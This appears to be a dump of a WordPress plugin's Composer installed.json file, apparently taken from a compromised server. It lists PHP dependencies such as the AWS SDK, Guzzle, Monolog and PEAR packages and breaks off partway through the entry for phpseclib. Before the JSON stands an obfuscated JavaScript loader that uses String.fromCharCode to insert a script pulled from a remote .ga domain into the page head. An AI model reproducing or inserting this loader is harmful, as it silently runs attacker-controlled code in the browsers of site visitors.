Current File : /home/:/elitechc.bak/public_html/wp-content/plugins/backwpup/vendor/composer/installed.json
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();[
    {
        "name": "aws/aws-sdk-php",
        "version": "3.93.7",
        "version_normalized": "3.93.7.0",
        "source": {
            "type": "git",
            "url": "https://github.com/aws/aws-sdk-php.git",
            "reference": "41fe205dae433d5cd7a48a4117d37a43a44ed0d2"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/41fe205dae433d5cd7a48a4117d37a43a44ed0d2",
            "reference": "41fe205dae433d5cd7a48a4117d37a43a44ed0d2",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "ext-json": "*",
            "ext-pcre": "*",
            "ext-simplexml": "*",
            "guzzlehttp/guzzle": "^5.3.3|^6.2.1",
            "guzzlehttp/promises": "~1.0",
            "guzzlehttp/psr7": "^1.4.1",
            "mtdowling/jmespath.php": "~2.2",
            "php": ">=5.5"
        },
        "require-dev": {
            "andrewsville/php-token-reflection": "^1.4",
            "aws/aws-php-sns-message-validator": "~1.0",
            "behat/behat": "~3.0",
            "doctrine/cache": "~1.4",
            "ext-dom": "*",
            "ext-openssl": "*",
            "ext-pcntl": "*",
            "ext-sockets": "*",
            "nette/neon": "^2.3",
            "phpunit/phpunit": "^4.8.35|^5.4.3",
            "psr/cache": "^1.0",
            "psr/simple-cache": "^1.0"
        },
        "suggest": {
            "aws/aws-php-sns-message-validator": "To validate incoming SNS notifications",
            "doctrine/cache": "To use the DoctrineCacheAdapter",
            "ext-curl": "To send requests using cURL",
            "ext-openssl": "Allows working with CloudFront private distributions and verifying received SNS messages",
            "ext-sockets": "To use client-side monitoring"
        },
        "time": "2019-05-10T18:13:26+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "3.0-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Aws\\": "src/"
            },
            "files": [
                "src/functions.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "Apache-2.0"
        ],
        "authors": [
            {
                "name": "Amazon Web Services",
                "homepage": "http://aws.amazon.com"
            }
        ],
        "description": "AWS SDK for PHP - Use Amazon Web Services in your PHP project",
        "homepage": "http://aws.amazon.com/sdkforphp",
        "keywords": [
            "amazon",
            "aws",
            "cloud",
            "dynamodb",
            "ec2",
            "glacier",
            "s3",
            "sdk"
        ]
    },
    {
        "name": "christian-riesen/base32",
        "version": "1.3.2",
        "version_normalized": "1.3.2.0",
        "source": {
            "type": "git",
            "url": "https://github.com/ChristianRiesen/base32.git",
            "reference": "80ff0e3b2124e61b4b39e2535709452f70bff367"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/ChristianRiesen/base32/zipball/80ff0e3b2124e61b4b39e2535709452f70bff367",
            "reference": "80ff0e3b2124e61b4b39e2535709452f70bff367",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3"
        },
        "require-dev": {
            "php": ">=5.6",
            "phpunit/phpunit": "^5.0",
            "satooshi/php-coveralls": "^1.0"
        },
        "time": "2018-11-02T09:03:50+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.1.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Base32\\": "src/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Christian Riesen",
                "email": "chris.riesen@gmail.com",
                "homepage": "http://christianriesen.com",
                "role": "Developer"
            }
        ],
        "description": "Base32 encoder/decoder according to RFC 4648",
        "homepage": "https://github.com/ChristianRiesen/base32",
        "keywords": [
            "base32",
            "decode",
            "encode",
            "rfc4648"
        ]
    },
    {
        "name": "guzzle/guzzle",
        "version": "v3.8.1",
        "version_normalized": "3.8.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/guzzle/guzzle.git",
            "reference": "4de0618a01b34aa1c8c33a3f13f396dcd3882eba"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/guzzle/guzzle/zipball/4de0618a01b34aa1c8c33a3f13f396dcd3882eba",
            "reference": "4de0618a01b34aa1c8c33a3f13f396dcd3882eba",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "ext-curl": "*",
            "php": ">=5.3.3",
            "symfony/event-dispatcher": ">=2.1"
        },
        "replace": {
            "guzzle/batch": "self.version",
            "guzzle/cache": "self.version",
            "guzzle/common": "self.version",
            "guzzle/http": "self.version",
            "guzzle/inflection": "self.version",
            "guzzle/iterator": "self.version",
            "guzzle/log": "self.version",
            "guzzle/parser": "self.version",
            "guzzle/plugin": "self.version",
            "guzzle/plugin-async": "self.version",
            "guzzle/plugin-backoff": "self.version",
            "guzzle/plugin-cache": "self.version",
            "guzzle/plugin-cookie": "self.version",
            "guzzle/plugin-curlauth": "self.version",
            "guzzle/plugin-error-response": "self.version",
            "guzzle/plugin-history": "self.version",
            "guzzle/plugin-log": "self.version",
            "guzzle/plugin-md5": "self.version",
            "guzzle/plugin-mock": "self.version",
            "guzzle/plugin-oauth": "self.version",
            "guzzle/service": "self.version",
            "guzzle/stream": "self.version"
        },
        "require-dev": {
            "doctrine/cache": "*",
            "monolog/monolog": "1.*",
            "phpunit/phpunit": "3.7.*",
            "psr/log": "1.0.*",
            "symfony/class-loader": "*",
            "zendframework/zend-cache": "<2.3",
            "zendframework/zend-log": "<2.3"
        },
        "time": "2014-01-28T22:29:15+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "3.8-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "Guzzle": "src/",
                "Guzzle\\Tests": "tests/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Michael Dowling",
                "email": "mtdowling@gmail.com",
                "homepage": "https://github.com/mtdowling"
            },
            {
                "name": "Guzzle Community",
                "homepage": "https://github.com/guzzle/guzzle/contributors"
            }
        ],
        "description": "Guzzle is a PHP HTTP client library and framework for building RESTful web service clients",
        "homepage": "http://guzzlephp.org/",
        "keywords": [
            "client",
            "curl",
            "framework",
            "http",
            "http client",
            "rest",
            "web service"
        ],
        "abandoned": "guzzlehttp/guzzle"
    },
    {
        "name": "guzzlehttp/guzzle",
        "version": "6.4.1",
        "version_normalized": "6.4.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/guzzle/guzzle.git",
            "reference": "0895c932405407fd3a7368b6910c09a24d26db11"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/guzzle/guzzle/zipball/0895c932405407fd3a7368b6910c09a24d26db11",
            "reference": "0895c932405407fd3a7368b6910c09a24d26db11",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "ext-json": "*",
            "guzzlehttp/promises": "^1.0",
            "guzzlehttp/psr7": "^1.6.1",
            "php": ">=5.5"
        },
        "require-dev": {
            "ext-curl": "*",
            "phpunit/phpunit": "^4.8.35 || ^5.7 || ^6.4 || ^7.0",
            "psr/log": "^1.1"
        },
        "suggest": {
            "psr/log": "Required for using the Log middleware"
        },
        "time": "2019-10-23T15:58:00+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "6.3-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "GuzzleHttp\\": "src/"
            },
            "files": [
                "src/functions_include.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Michael Dowling",
                "email": "mtdowling@gmail.com",
                "homepage": "https://github.com/mtdowling"
            }
        ],
        "description": "Guzzle is a PHP HTTP client library",
        "homepage": "http://guzzlephp.org/",
        "keywords": [
            "client",
            "curl",
            "framework",
            "http",
            "http client",
            "rest",
            "web service"
        ]
    },
    {
        "name": "guzzlehttp/promises",
        "version": "v1.3.1",
        "version_normalized": "1.3.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/guzzle/promises.git",
            "reference": "a59da6cf61d80060647ff4d3eb2c03a2bc694646"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/guzzle/promises/zipball/a59da6cf61d80060647ff4d3eb2c03a2bc694646",
            "reference": "a59da6cf61d80060647ff4d3eb2c03a2bc694646",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.5.0"
        },
        "require-dev": {
            "phpunit/phpunit": "^4.0"
        },
        "time": "2016-12-20T10:07:11+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.4-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "GuzzleHttp\\Promise\\": "src/"
            },
            "files": [
                "src/functions_include.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Michael Dowling",
                "email": "mtdowling@gmail.com",
                "homepage": "https://github.com/mtdowling"
            }
        ],
        "description": "Guzzle promises library",
        "keywords": [
            "promise"
        ]
    },
    {
        "name": "guzzlehttp/psr7",
        "version": "1.6.1",
        "version_normalized": "1.6.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/guzzle/psr7.git",
            "reference": "239400de7a173fe9901b9ac7c06497751f00727a"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/guzzle/psr7/zipball/239400de7a173fe9901b9ac7c06497751f00727a",
            "reference": "239400de7a173fe9901b9ac7c06497751f00727a",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.4.0",
            "psr/http-message": "~1.0",
            "ralouphie/getallheaders": "^2.0.5 || ^3.0.0"
        },
        "provide": {
            "psr/http-message-implementation": "1.0"
        },
        "require-dev": {
            "ext-zlib": "*",
            "phpunit/phpunit": "~4.8.36 || ^5.7.27 || ^6.5.8"
        },
        "suggest": {
            "zendframework/zend-httphandlerrunner": "Emit PSR-7 responses"
        },
        "time": "2019-07-01T23:21:34+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.6-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "GuzzleHttp\\Psr7\\": "src/"
            },
            "files": [
                "src/functions_include.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Michael Dowling",
                "email": "mtdowling@gmail.com",
                "homepage": "https://github.com/mtdowling"
            },
            {
                "name": "Tobias Schultze",
                "homepage": "https://github.com/Tobion"
            }
        ],
        "description": "PSR-7 message implementation that also provides common utility methods",
        "keywords": [
            "http",
            "message",
            "psr-7",
            "request",
            "response",
            "stream",
            "uri",
            "url"
        ]
    },
    {
        "name": "inpsyde/backwpup-shared",
        "version": "dev-master",
        "version_normalized": "9999999-dev",
        "source": {
            "type": "git",
            "url": "git@bitbucket.org:inpsyde/backwpup-shared.git",
            "reference": "ae4f14c987fbd84b7dcdcb6592cbcab6cd9090b5"
        },
        "dist": {
            "type": "zip",
            "url": "https://bitbucket.org/inpsyde/backwpup-shared/get/ae4f14c987fbd84b7dcdcb6592cbcab6cd9090b5.zip",
            "reference": "ae4f14c987fbd84b7dcdcb6592cbcab6cd9090b5",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "ext-fileinfo": "*",
            "php": ">=5.6"
        },
        "require-dev": {
            "brain/monkey": "^2.0@dev",
            "inpsyde/php-coding-standards": "^0.13.0@dev",
            "phpunit/phpunit": "^6"
        },
        "time": "2019-08-30T06:40:30+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.0.x-dev"
            }
        },
        "installation-source": "source",
        "autoload": {
            "psr-4": {
                "Inpsyde\\BackWPupShared\\": "src/"
            }
        },
        "autoload-dev": {
            "psr-4": {
                "Inpsyde\\BackWPupShared\\Tests\\": "tests/php/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Inpsyde GmbH",
                "email": "hello@inpsyde.com"
            }
        ],
        "description": "Shared repository for free, pro and restore",
        "homepage": "https://bitbucket.org/inpsyde/backwpup-shared",
        "support": {
            "source": "https://bitbucket.org/inpsyde/backwpup-shared/src/ae4f14c987fbd84b7dcdcb6592cbcab6cd9090b5/?at=master"
        }
    },
    {
        "name": "inpsyde/phone-home-client",
        "version": "0.1.2",
        "version_normalized": "0.1.2.0",
        "source": {
            "type": "git",
            "url": "git@bitbucket.org:inpsyde/phone-home-client.git",
            "reference": "041bf5d093b7dcb2574210f09f9d24939d3482a3"
        },
        "dist": {
            "type": "zip",
            "url": "https://bitbucket.org/inpsyde/phone-home-client/get/041bf5d093b7dcb2574210f09f9d24939d3482a3.zip",
            "reference": "041bf5d093b7dcb2574210f09f9d24939d3482a3",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.2"
        },
        "time": "2019-04-26T13:35:19+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "0.1.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "classmap": [
                "src/"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "GPL-3.0"
        ],
        "authors": [
            {
                "name": "Inpsyde GmbH",
                "email": "hello@inpsyde.com",
                "homepage": "http://inpsyde.com",
                "role": "Company"
            },
            {
                "name": "Giuseppe Mazzapica",
                "email": "giuseppe.mazzapica@gmail.com",
                "role": "Developer"
            }
        ],
        "description": "A WordPress package to be used by plugins to add a page that ask for phone-home consensus and send data in case user approves.",
        "homepage": "https://bitbucket.org/inpsyde/phone-home-client",
        "support": {
            "source": "https://bitbucket.org/inpsyde/phone-home-client/src/041bf5d093b7dcb2574210f09f9d24939d3482a3/?at=0.1.2"
        }
    },
    {
        "name": "microsoft/azure-storage-blob",
        "version": "1.4.0",
        "version_normalized": "1.4.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/Azure/azure-storage-blob-php.git",
            "reference": "8310c2ecab488fa325db3dcf2f8723bbcfe58941"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/Azure/azure-storage-blob-php/zipball/8310c2ecab488fa325db3dcf2f8723bbcfe58941",
            "reference": "8310c2ecab488fa325db3dcf2f8723bbcfe58941",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "microsoft/azure-storage-common": "~1.4",
            "php": ">=5.6.0"
        },
        "time": "2019-04-26T15:06:52+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "MicrosoftAzure\\Storage\\Blob\\": "src/Blob"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Azure Storage PHP Client Library",
                "email": "dmsh@microsoft.com"
            }
        ],
        "description": "This project provides a set of PHP client libraries that make it easy to access Microsoft Azure Storage Blob APIs.",
        "keywords": [
            "azure",
            "blob",
            "php",
            "sdk",
            "storage"
        ]
    },
    {
        "name": "microsoft/azure-storage-common",
        "version": "1.4.0",
        "version_normalized": "1.4.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/Azure/azure-storage-common-php.git",
            "reference": "435adf4d09f0b34375f899b5627d2926bfe317e6"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/Azure/azure-storage-common-php/zipball/435adf4d09f0b34375f899b5627d2926bfe317e6",
            "reference": "435adf4d09f0b34375f899b5627d2926bfe317e6",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "guzzlehttp/guzzle": "~6.0",
            "php": ">=5.6.0"
        },
        "time": "2019-04-26T15:02:17+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "MicrosoftAzure\\Storage\\Common\\": "src/Common"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Azure Storage PHP Client Library",
                "email": "dmsh@microsoft.com"
            }
        ],
        "description": "This project provides a set of common code shared by Azure Storage Blob, Table, Queue and File PHP client libraries.",
        "keywords": [
            "azure",
            "common",
            "php",
            "sdk",
            "storage"
        ]
    },
    {
        "name": "mikemccabe/json-patch-php",
        "version": "0.1.0",
        "version_normalized": "0.1.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/mikemccabe/json-patch-php.git",
            "reference": "b3af30a6aec7f6467c773cd49b2d974a70f7c0d4"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/mikemccabe/json-patch-php/zipball/b3af30a6aec7f6467c773cd49b2d974a70f7c0d4",
            "reference": "b3af30a6aec7f6467c773cd49b2d974a70f7c0d4",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "time": "2015-01-05T21:19:54+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "mikemccabe\\JsonPatch\\": "src"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "LGPL-3.0"
        ],
        "description": "Produce and apply json-patch objects"
    },
    {
        "name": "monolog/monolog",
        "version": "1.23.0",
        "version_normalized": "1.23.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/Seldaek/monolog.git",
            "reference": "fd8c787753b3a2ad11bc60c063cff1358a32a3b4"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/Seldaek/monolog/zipball/fd8c787753b3a2ad11bc60c063cff1358a32a3b4",
            "reference": "fd8c787753b3a2ad11bc60c063cff1358a32a3b4",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.0",
            "psr/log": "~1.0"
        },
        "provide": {
            "psr/log-implementation": "1.0.0"
        },
        "require-dev": {
            "aws/aws-sdk-php": "^2.4.9 || ^3.0",
            "doctrine/couchdb": "~1.0@dev",
            "graylog2/gelf-php": "~1.0",
            "jakub-onderka/php-parallel-lint": "0.9",
            "php-amqplib/php-amqplib": "~2.4",
            "php-console/php-console": "^3.1.3",
            "phpunit/phpunit": "~4.5",
            "phpunit/phpunit-mock-objects": "2.3.0",
            "ruflin/elastica": ">=0.90 <3.0",
            "sentry/sentry": "^0.13",
            "swiftmailer/swiftmailer": "^5.3|^6.0"
        },
        "suggest": {
            "aws/aws-sdk-php": "Allow sending log messages to AWS services like DynamoDB",
            "doctrine/couchdb": "Allow sending log messages to a CouchDB server",
            "ext-amqp": "Allow sending log messages to an AMQP server (1.0+ required)",
            "ext-mongo": "Allow sending log messages to a MongoDB server",
            "graylog2/gelf-php": "Allow sending log messages to a GrayLog2 server",
            "mongodb/mongodb": "Allow sending log messages to a MongoDB server via PHP Driver",
            "php-amqplib/php-amqplib": "Allow sending log messages to an AMQP server using php-amqplib",
            "php-console/php-console": "Allow sending log messages to Google Chrome",
            "rollbar/rollbar": "Allow sending log messages to Rollbar",
            "ruflin/elastica": "Allow sending log messages to an Elastic Search server",
            "sentry/sentry": "Allow sending log messages to a Sentry server"
        },
        "time": "2017-06-19T01:22:40+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "2.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Monolog\\": "src/Monolog"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Jordi Boggiano",
                "email": "j.boggiano@seld.be",
                "homepage": "http://seld.be"
            }
        ],
        "description": "Sends your logs to files, sockets, inboxes, databases and various web services",
        "homepage": "http://github.com/Seldaek/monolog",
        "keywords": [
            "log",
            "logging",
            "psr-3"
        ]
    },
    {
        "name": "mtdowling/jmespath.php",
        "version": "2.4.0",
        "version_normalized": "2.4.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/jmespath/jmespath.php.git",
            "reference": "adcc9531682cf87dfda21e1fd5d0e7a41d292fac"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/jmespath/jmespath.php/zipball/adcc9531682cf87dfda21e1fd5d0e7a41d292fac",
            "reference": "adcc9531682cf87dfda21e1fd5d0e7a41d292fac",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.4.0"
        },
        "require-dev": {
            "phpunit/phpunit": "~4.0"
        },
        "time": "2016-12-03T22:08:25+00:00",
        "bin": [
            "bin/jp.php"
        ],
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "2.0-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "JmesPath\\": "src/"
            },
            "files": [
                "src/JmesPath.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Michael Dowling",
                "email": "mtdowling@gmail.com",
                "homepage": "https://github.com/mtdowling"
            }
        ],
        "description": "Declaratively specify how to extract elements from a JSON document",
        "keywords": [
            "json",
            "jsonpath"
        ]
    },
    {
        "name": "pear/archive_tar",
        "version": "1.4.3",
        "version_normalized": "1.4.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/pear/Archive_Tar.git",
            "reference": "43455c960da70e655c6bdf8ea2bc8cc1a6034afb"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/pear/Archive_Tar/zipball/43455c960da70e655c6bdf8ea2bc8cc1a6034afb",
            "reference": "43455c960da70e655c6bdf8ea2bc8cc1a6034afb",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "pear/pear-core-minimal": "^1.10.0alpha2",
            "php": ">=5.2.0"
        },
        "require-dev": {
            "phpunit/phpunit": "*"
        },
        "suggest": {
            "ext-bz2": "bz2 compression support.",
            "ext-xz": "lzma2 compression support.",
            "ext-zlib": "Gzip compression support."
        },
        "time": "2017-06-11T17:28:11+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.4.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "Archive_Tar": ""
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "include-path": [
            "./"
        ],
        "license": [
            "BSD-3-Clause"
        ],
        "authors": [
            {
                "name": "Vincent Blavet",
                "email": "vincent@phpconcept.net"
            },
            {
                "name": "Greg Beaver",
                "email": "greg@chiaraquartet.net"
            },
            {
                "name": "Michiel Rook",
                "email": "mrook@php.net"
            }
        ],
        "description": "Tar file management class",
        "homepage": "https://github.com/pear/Archive_Tar",
        "keywords": [
            "archive",
            "tar"
        ]
    },
    {
        "name": "pear/console_getopt",
        "version": "v1.4.2",
        "version_normalized": "1.4.2.0",
        "source": {
            "type": "git",
            "url": "https://github.com/pear/Console_Getopt.git",
            "reference": "6c77aeb625b32bd752e89ee17972d103588b90c0"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/pear/Console_Getopt/zipball/6c77aeb625b32bd752e89ee17972d103588b90c0",
            "reference": "6c77aeb625b32bd752e89ee17972d103588b90c0",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "time": "2019-02-06T16:52:33+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "Console": "./"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "include-path": [
            "./"
        ],
        "license": [
            "BSD-2-Clause"
        ],
        "authors": [
            {
                "name": "Greg Beaver",
                "email": "cellog@php.net",
                "role": "Helper"
            },
            {
                "name": "Andrei Zmievski",
                "email": "andrei@php.net",
                "role": "Lead"
            },
            {
                "name": "Stig Bakken",
                "email": "stig@php.net",
                "role": "Developer"
            }
        ],
        "description": "More info available on: http://pear.php.net/package/Console_Getopt"
    },
    {
        "name": "pear/pear-core-minimal",
        "version": "v1.10.9",
        "version_normalized": "1.10.9.0",
        "source": {
            "type": "git",
            "url": "https://github.com/pear/pear-core-minimal.git",
            "reference": "742be8dd68c746a01e4b0a422258e9c9cae1c37f"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/pear/pear-core-minimal/zipball/742be8dd68c746a01e4b0a422258e9c9cae1c37f",
            "reference": "742be8dd68c746a01e4b0a422258e9c9cae1c37f",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "pear/console_getopt": "~1.4",
            "pear/pear_exception": "~1.0"
        },
        "replace": {
            "rsky/pear-core-min": "self.version"
        },
        "time": "2019-03-13T18:15:44+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "": "src/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "include-path": [
            "src/"
        ],
        "license": [
            "BSD-3-Clause"
        ],
        "authors": [
            {
                "name": "Christian Weiske",
                "email": "cweiske@php.net",
                "role": "Lead"
            }
        ],
        "description": "Minimal set of PEAR core files to be used as composer dependency"
    },
    {
        "name": "pear/pear_exception",
        "version": "v1.0.0",
        "version_normalized": "1.0.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/pear/PEAR_Exception.git",
            "reference": "8c18719fdae000b690e3912be401c76e406dd13b"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/pear/PEAR_Exception/zipball/8c18719fdae000b690e3912be401c76e406dd13b",
            "reference": "8c18719fdae000b690e3912be401c76e406dd13b",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=4.4.0"
        },
        "require-dev": {
            "phpunit/phpunit": "*"
        },
        "time": "2015-02-10T20:07:52+00:00",
        "type": "class",
        "extra": {
            "branch-alias": {
                "dev-master": "1.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "PEAR": ""
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "include-path": [
            "."
        ],
        "license": [
            "BSD-2-Clause"
        ],
        "authors": [
            {
                "name": "Helgi Thormar",
                "email": "dufuz@php.net"
            },
            {
                "name": "Greg Beaver",
                "email": "cellog@php.net"
            }
        ],
        "description": "The PEAR Exception base class.",
        "homepage": "https://github.com/pear/PEAR_Exception",
        "keywords": [
            "exception"
        ]
    },
    {
        "name": "phpseclib/phpseclib",
        "version": "2.0.11",
        "version_normalized": "2.0.11.0",
        "source": {
            "type": "git",
            "url": "https://github.com/phpseclib/phpseclib.git",
            "reference": "7053f06f91b3de78e143d430e55a8f7889efc08b"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/7053f06f91b3de78e143d430e55a8f7889efc08b",
            "reference": "7053f06f91b3de78e143d430e55a8f7889efc08b",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.3"
        },
        "require-dev": {
            "phing/phing": "~2.7",
            "phpunit/phpunit": "^4.8.35|^5.7|^6.0",
            "sami/sami": "~2.0",
            "squizlabs/php_codesniffer": "~2.0"
        },
        "suggest": {
